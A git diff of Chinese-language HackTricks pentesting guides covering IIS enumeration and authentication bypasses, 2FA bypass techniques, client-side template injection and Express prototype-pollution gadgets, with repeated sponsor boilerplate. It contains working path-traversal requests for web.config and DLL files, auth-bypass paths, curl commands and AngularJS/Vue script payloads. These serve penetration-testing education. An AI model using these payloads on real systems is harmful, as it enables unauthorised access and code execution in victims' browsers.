@ -333,14 +333,14 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家</strong></a><strong></strong></summary>
支持HackTricks的其他方式
支持 HackTricks 的其他方式:
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**上关注我们**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 如果您想在 HackTricks 中看到您的**公司广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord **](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
</details>

72
network-services-pentesting/pentesting-web/iis-internet-information-services.md
View file

@ -8,17 +8,17 @@
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**支持的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫持和勒索软件攻击。
@ -37,7 +37,7 @@ WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫
## 内部IP地址泄露
在任何收到302响应的IIS服务器上您可以尝试剥离Host标头并使用HTTP/1.0在响应中Location标头可能指向内部IP地址
在任何收到302响应的IIS服务器上您可以尝试剥离主机头并使用HTTP/1.0在响应中Location头可能指向内部IP地址
```
nc -v domain.com 80
openssl s_client -connect domain.com:443
@ -84,11 +84,11 @@ X-FEServer: NHEXCHANGE2016
{% hint style="info" %}
简而言之,应用程序的文件夹中有几个包含对 "**assemblyIdentity**" 文件和 "**namespaces**" 的引用的 web.config 文件。有了这些信息,就可以知道 **可执行文件的位置** 并下载它们。\
**下载的 Dlls** 中,还可以找到 **新的命名空间**,您应该尝试访问并获取 web.config 文件,以查找新的命名空间和 assemblyIdentity。\
**下载的 Dlls** 中,还可以找到应该尝试访问并获取 web.config 文件以查找新的 namespaces 和 assemblyIdentity 的 **新 namespaces**。\
此外,文件 **connectionstrings.config****global.asax** 可能包含有趣的信息。\\
{% endhint %}
**.Net MVC 应用程序** 中,**web.config** 文件通过指定每个二进制文件应用程序依赖的 **"assemblyIdentity"** XML 标签发挥关键作用
**.Net MVC 应用程序** 中,**web.config** 文件通过 **"assemblyIdentity"** XML 标记指定应用程序依赖的每个二进制文件
### **探索二进制文件**
@ -97,30 +97,30 @@ X-FEServer: NHEXCHANGE2016
GET /download_page?id=..%2f..%2fweb.config HTTP/1.1
Host: example-mvc-application.minded
```
这个请求揭示了各种设置和依赖关系,比如:
此请求显示了各种设置和依赖项,例如:
* **EntityFramework** 版本
* 用于网页、客户端验证和 JavaScript 的 **AppSettings**
* 用于身份验证和运行时的 **System.web** 配置
* **System.webServer** 模块设置
* 用于**Microsoft.Owin**、**Newtonsoft.Json** 和 **System.Web.Mvc** 等多个库的 **Runtime** 组件绑定
* 用于许多库的 **Runtime** 组件绑定,**Microsoft.Owin**、**Newtonsoft.Json** 和 **System.Web.Mvc**
这些设置表明某些文件,**/bin/WebGrease.dll**,位于应用程序的 /bin 文件夹中。
这些设置表明某些文件,如 **/bin/WebGrease.dll**,位于应用程序的 /bin 文件夹中。
### **根目录文件**
根目录中的文件,**/global.asax** 和 **/connectionstrings.config**(其中包含敏感密码),对应用程序的配置和运行至关重要。
根目录中的文件,如 **/global.asax** 和 **/connectionstrings.config**(其中包含敏感密码),对应用程序的配置和操作至关重要。
### **命名空间和 Web.Config**
MVC 应用程序还为特定命名空间定义额外的 **web.config 文件**,以避免在每个文件中重复声明,如通过请求下载另一个 **web.config** 所示:
MVC 应用程序还为特定命名空间定义额外的 **web.config 文件**,以避免在每个文件中重复声明,如通过请求下载另一个 **web.config** 文件所示:
```markup
GET /download_page?id=..%2f..%2fViews/web.config HTTP/1.1
Host: example-mvc-application.minded
```
### **下载 DLLs**
提到自定义命名空间暗示着一个名为 "**WebApplication1**" 的 DLL 存在于 /bin 目录中。接着展示了下载 **WebApplication1.dll** 的请求:
提到自定义命名空间暗示着在 /bin 目录中存在一个名为 "**WebApplication1**" 的 DLL。接着展示了下载 **WebApplication1.dll** 的请求:
```markup
GET /download_page?id=..%2f..%2fbin/WebApplication1.dll HTTP/1.1
Host: example-mvc-application.minded
@ -210,37 +210,37 @@ C:\xampp\tomcat\conf\server.xml
```
## HTTPAPI 2.0 404错误
如果看到如下错误:
如果看到如下错误:
![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (10) (2).png>)
![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (10) (2).png>)
这意味着服务器**未收到Host标头中的正确域名**。\
为了访问网页,您可以查看提供的**SSL证书**,也许您可以在其中找到域名/子域名。如果找不到,您可能需要**暴力破解虚拟主机**直到找到正确的主机
这意味着服务器**没有收到正确的域名**在Host标头中。\
为了访问网页,你可以查看提供的**SSL证书**,也许你可以在其中找到域名/子域名。如果找不到,你可能需要**暴力破解虚拟主机**直到找到正确的一个
## 值得寻找的旧IIS漏洞
### Microsoft IIS波浪符“\~”漏洞/特性 - 短文件/文件夹名泄露
### Microsoft IIS波浪符“\~”漏洞/特性 - 短文件/文件夹名泄露
您可以尝试使用此**技术**在每个发现的文件夹中**枚举文件夹和文件**(即使需要基本身份验证)。\
技术的主要限制是,如果服务器存在漏洞,**它只能找到每个文件/文件夹名称的前6个字母和文件扩展名的前3个字母**。
你可以尝试使用这个**技术**来**枚举**每个发现的文件夹中的文件和文件夹(即使需要基本身份验证)。\
这种技术的主要限制是,如果服务器存在漏洞,**它只能找到每个文件/文件夹名称的前6个字母和文件扩展名的前3个字母**。
可以使用[https://github.com/irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner)来测试漏洞:`java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/`
可以使用[https://github.com/irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner)来测试这个漏洞:`java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/`
![](<../../.gitbook/assets/image (841).png>)
原始研究:[https://soroush.secproject.com/downloadable/microsoft\_iis\_tilde\_character\_vulnerability\_feature.pdf](https://soroush.secproject.com/downloadable/microsoft\_iis\_tilde\_character\_vulnerability\_feature.pdf)
您还可以使用**metasploit**`use scanner/http/iis_shortname_scanner`
你也可以使用**metasploit**`use scanner/http/iis_shortname_scanner`
### 基本身份验证绕过
尝试绕过基本身份验证(**IIS 7.5**)尝试访问:`/admin:$i30:$INDEX_ALLOCATION/admin.php`或`/admin::$INDEX_ALLOCATION/admin.php`
您可以尝试**结合**此**漏洞**和上一个漏洞来查找新的**文件夹**并**绕过**身份验证。
你可以尝试**结合**这个**漏洞**和上一个来发现新的**文件夹**并**绕过**身份验证。
## ASP.NET Trace.AXD启用调试
ASP.NET包括调试模式其文件名为`trace.axd`。
ASP.NET包括一个调试模式,其文件名为`trace.axd`。
它会详细记录一段时间内发送到应用程序的所有请求。
@ -254,17 +254,17 @@ ASP.NET包括调试模式其文件名为`trace.axd`。
ASPXAUTH使用以下信息
* **`validationKey`**(字符串):用于签名验证的十六进制编码密钥。
* **`decryptionMethod`**字符串默认为“AES”
* **`decryptionIV`**(字符串):十六进制编码的初始化向量(默认为零向量)。
* **`decryptionKey`**(字符串):用于解密的十六进制编码密钥。
- **`validationKey`**(字符串):用于签名验证的十六进制编码密钥。
- **`decryptionMethod`**字符串默认为“AES”
- **`decryptionIV`**(字符串):十六进制编码的初始化向量(默认为零向量)。
- **`decryptionKey`**(字符串):用于解密的十六进制编码密钥。
然而,一些人会使用这些参数的**默认值**,并将用户的**电子邮件用作cookie**。因此,如果您可以找到一个使用ASPXAUTH cookie的**相同平台**的网站,并在受攻击的服务器上创建一个使用要模拟用户的用户的电子邮件的用户,您可能能够在第一个服务器中使用第二个服务器的cookie并冒充用户。\
然而,一些人会使用这些参数的**默认值**,并将用户的**电子邮件作为cookie**。因此,如果你能找到一个使用ASPXAUTH cookie的**相同平台**的网站,并在受攻击的服务器上创建一个使用要冒充用户的用户的电子邮件的用户,你可能能够在第一个服务器中使用第二个服务器的cookie并冒充用户。\
这种攻击在这个[**writeup**](https://infosecwriteups.com/how-i-hacked-facebook-part-two-ffab96d57b19)中起作用。
## 使用缓存密码绕过IIS身份验证CVE-2022-30209<a href="#id-3-iis-authentication-bypass" id="id-3-iis-authentication-bypass"></a>
## IIS身份验证绕过缓存密码CVE-2022-30209<a href="#id-3-iis-authentication-bypass" id="id-3-iis-authentication-bypass"></a>
[完整报告在此处](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html):代码中的一个错误**未正确检查用户提供的密码**,因此,如果**密码哈希命中已在缓存中的密钥**攻击者将能够以该用户身份登录。
[完整报告在此处](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html):代码中的一个错误**未正确检查用户提供的密码**,因此,如果攻击者的**密码哈希命中已在缓存中的密钥**,将能够以该用户身份登录。
```python
# script for sanity check
> type test.py
@ -284,11 +284,11 @@ HTTP/1.1 401 Unauthorized
> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
HTTP/1.1 200 OK
```
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**推动的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫持和勒索软件攻击。
@ -304,8 +304,8 @@ WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)****
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>

52
pentesting-web/2fa-bypass.md
View file

@ -6,7 +6,7 @@
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 如果您想看到您的**公司在HackTricks中广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
@ -14,13 +14,13 @@
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的侵害。
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫持和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
@ -40,7 +40,7 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
### **利用未使用的令牌**
尝试从自己的账户中提取令牌以绕过另一个账户的两步验证。
尝试从自己的账户中提取一个令牌以绕过另一个账户的两步验证。
### **令牌暴露**
@ -48,11 +48,11 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
### **验证链接利用**
使用在账户创建时发送的**电子邮件验证链接**可以允许在没有两步验证的情况下访问个人资料,如详细[帖子](https://srahulceh.medium.com/behind-the-scenes-of-a-security-bug-the-perils-of-2fa-cookie-generation-496d9519771b)中所
使用在账户创建时发送的**电子邮件验证链接**可以允许在没有两步验证的情况下访问个人资料,如详细[帖子](https://srahulceh.medium.com/behind-the-scenes-of-a-security-bug-the-perils-of-2fa-cookie-generation-496d9519771b)中所强调的
### **会话操纵**
为用户和受害者的账户启动会话,并为用户的账户完成两步验证而不继续,允许尝试访问受害者账户流程的下一步,利用后端会话管理限制。
为用户和受害者的账户启动会话,并在用户的账户完成两步验证后不继续,尝试访问受害者账户流程的下一步,利用后端会话管理限制。
### **密码重置机制**
@ -60,7 +60,7 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
### **OAuth平台被入侵**
入侵用户在受信任的**OAuth**平台例如Google、Facebook上的账户可提供绕过两步验证的途径。
入侵用户在受信任的**OAuth**平台例如Google、Facebook上的账户可提供绕过两步验证的途径。
### **暴力破解攻击**
@ -74,11 +74,11 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
#### **代码重新发送限制重置**
重新发送代码会重置速率限制,促进持续的暴力破解尝试。
重新发送代码会重置速率限制,促使继续进行暴力破解尝试。
#### **客户端速率限制规避**
一份文件详细介绍了绕过客户端速率限制的技术。
一份文件详细介绍了规避客户端速率限制的技术。
#### **内部操作缺乏速率限制**
@ -96,15 +96,15 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
利用竞争条件进行两步验证绕过可以在特定文件中找到。
### **CSRF/点击劫持漏洞**
### **CSRF/Clickjacking漏洞**
探索CSRF或点击劫持漏洞以禁用两步验证是一种可行的策略。
探索CSRF或Clickjacking漏洞以禁用两步验证是一种可行的策略。
### **“记住我”功能利用**
#### **可预测的Cookie值**
猜测“记住我”Cookie值可以绕过限制。
猜测“记住我”cookie值可以绕过限制。
#### **IP地址冒充**
@ -118,27 +118,27 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
#### **API端点**
旧的API版本通过/v\*目录路径指示,可能容易受到两步验证绕过方法的攻击。
通过/v\*目录路径指示的旧API版本可能容易受到两步验证绕过方法的攻击。
### **处理先前会话**
在两步验证激活时终止现有会话可保护账户免受来自受损会话的未经授权访问。
在两步验证激活时终止现有会话可保护账户免受未经授权的来自受损会话的访问。
### **带有备用代码的访问控制缺陷**
### **备用代码的访问控制缺陷**
在两步验证激活后立即生成备用代码并潜在地未经授权地检索备用代码尤其是在CORS配置错误/XSS漏洞的情况下存在风险。
在两步验证激活时立即生成备用代码并可能未经授权地检索备用代码尤其是在CORS配置错误/XSS漏洞的情况下会带来风险。
### **2FA页面上的信息露**
### **2FA页面上的信息露**
在2FA验证页面上露敏感信息(例如电话号码)是一个问题。
在2FA验证页面上露敏感信息(例如电话号码)是一个问题。
### **密码重置禁用2FA**
一个演示潜在绕过方法的过程涉及账户创建、2FA激活、密码重置和随后登录而无需2FA要求。
### **诱请求**
### **诱请求**
利用诱请求来混淆暴力破解尝试或误导速率限制机制为绕过策略增加另一层。制作这样的请求需要对应用程序的安全措施和速率限制行为有细致的理解。
利用诱请求来混淆暴力破解尝试或误导速率限制机制为绕过策略增加另一层。制作这样的请求需要对应用程序的安全措施和速率限制行为有细致的理解。
## 参考资料
@ -146,13 +146,13 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
* [https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718](https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的侵害。
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫持和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:

26
pentesting-web/client-side-template-injection-csti.md
View file

@ -1,6 +1,6 @@
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary><strong>从零开始学习AWS黑客技术成为</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
支持HackTricks的其他方式
@ -12,13 +12,13 @@
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**支持的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
@ -28,15 +28,15 @@ WhiteIntel的主要目标是打击由于信息窃取恶意软件导致的账户
# 摘要
这类似于[**服务器端模板注入**](ssti-server-side-template-injection/),但是出现在**客户端**。**SSTI**可以让您在远程服务器上**执行代码**,而**CSTI**可以让您在受害者的浏览器中**执行任意JavaScript**代码。
这类似于[**服务器端模板注入**](ssti-server-side-template-injection/),但是在**客户端**。**SSTI**可以让您在远程服务器上**执行代码**,而**CSTI**可以让您在受害者的浏览器中**执行任意JavaScript**代码。
对于这种漏洞的**测试**与**SSTI**的情况非常**相似**,解释器期望**一个模板**并将其执行。例如,使用像`{{ 7-7 }}`这样的有效负载,如果应用程序**存在漏洞**,您将看到一个`0`,如果没有,您将看到原始内容:`{{ 7-7 }}`
# AngularJS
AngularJS是一个广泛使用的JavaScript框架通过称为指令的属性与HTML进行交互其中一个著的指令是**`ng-app`**。该指令允许AngularJS处理HTML内容从而使JavaScript表达式在双大括号内执行
AngularJS是一个广泛使用的JavaScript框架通过称为指令的属性与HTML进行交互其中一个著的指令是**`ng-app`**。该指令允许AngularJS处理HTML内容从而执行双花括号内的JavaScript表达式
用户输入动态插入到标记为`ng-app`的HTML主体的情况下可以执行任意JavaScript代码。这可以通过利用输入中的AngularJS语法来实现。以下是演示如何执行JavaScript代码的示例
在用户输入动态插入到标记为`ng-app`的HTML主体的情况下可以执行任意JavaScript代码。这可以通过利用输入中的AngularJS语法来实现。以下是演示如何执行JavaScript代码的示例
```javascript
{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
@ -56,7 +56,7 @@ AngularJS是一个广泛使用的JavaScript框架通过称为指令的属性
您可以在[https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh)找到一个**易受攻击的Vue**实现。\
有效载荷:[`https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%`](https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor\(%27alert\(%22foo%22\)%27\)\(\)%7D%7D)
以及这个易受攻击示例的**源代码**在这里[https://github.com/azu/vue-client-side-template-injection-example](https://github.com/azu/vue-client-side-template-injection-example)
这里是易受攻击示例的**源代码**[https://github.com/azu/vue-client-side-template-injection-example](https://github.com/azu/vue-client-side-template-injection-example)
```markup
<!-- Google Research - Vue.js-->
"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>
@ -67,7 +67,7 @@ AngularJS是一个广泛使用的JavaScript框架通过称为指令的属性
```
{{_openBlock.constructor('alert(1)')()}}
```
Credit: [Gareth Heyes, Lewis Ardern & PwnFunction](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)
信用:[Gareth HeyesLewis Ardern和PwnFunction](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)
## **V2**
```
@ -99,9 +99,9 @@ javascript:alert(1)%252f%252f..%252fcss-images
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
@ -117,9 +117,9 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFT](https://opensea.io/collection/the-peass-family)收藏品
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。

26
pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.md
View file

@ -1,4 +1,4 @@
# Express原型污染工具
# Express原型污染工具
<details>
@ -8,17 +8,17 @@
- 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
- 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
- **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**支持的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
@ -58,7 +58,7 @@ res.send(req.body);
### JSON 空格
以下的 PP 使 JSON 内部的属性多出一个空格,而不会破坏功能:
以下的 PP 使 JSON 内部的属性多出一个空格,而不会破坏功能:
```json
{"__proto__":{"json spaces": " "}}
```
@ -68,7 +68,7 @@ res.send(req.body);
```
### 暴露的头部
以下的 PP gadget 会让服务器发送回 HTTP 头部:**`Access-Control-Expose_headers: foo`**
以下的 PP 工具将会让服务器发送回 HTTP 头部:**`Access-Control-Expose_headers: foo`**
```json
{"__proto__":{"exposedHeaders":["foo"]}}
```
@ -100,11 +100,11 @@ res.send(req.body);
```
### 反射值
当应用程序在其响应中包含一个对象时,创建一个带有`__proto__`旁边的**不寻常名称的属性**可能会很有见地。具体来说,如果在响应中**只返回不寻常的属性**,这可能表明应用程序存在漏洞:
一个应用程序在其响应中包含一个对象时,创建一个`__proto__` 并列的**不寻常名称的属性**可能会很有见地。具体来说,如果**响应中只返回了不寻常的属性**,这可能表明应用程序存在漏洞:
```json
{"unusualName":"value","__proto__":"test"}
```
此外,在使用诸如 Lodash 这样的库的情况下通过原型污染PP和直接在对象内部设置属性提供了另一种诊断方法。如果在响应中省略了这样的属性则表明 Lodash 在合并之前验证了目标对象中属性的存在:
此外,在使用诸如Lodash之类的库的情况下通过原型污染PP和直接在对象内部设置属性提供了另一种诊断方法。如果在响应中省略了这样的属性则表明Lodash在合并之前验证了目标对象中属性的存在
```javascript
{"__proto__":{"a":"value1"},"a":"value2","b":"value3"}
// If 'b' is the only property reflected, this indicates prototype pollution in Lodash
@ -125,11 +125,11 @@ res.send(req.body);
* [https://portswigger.net/research/server-side-prototype-pollution](https://portswigger.net/research/server-side-prototype-pollution)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
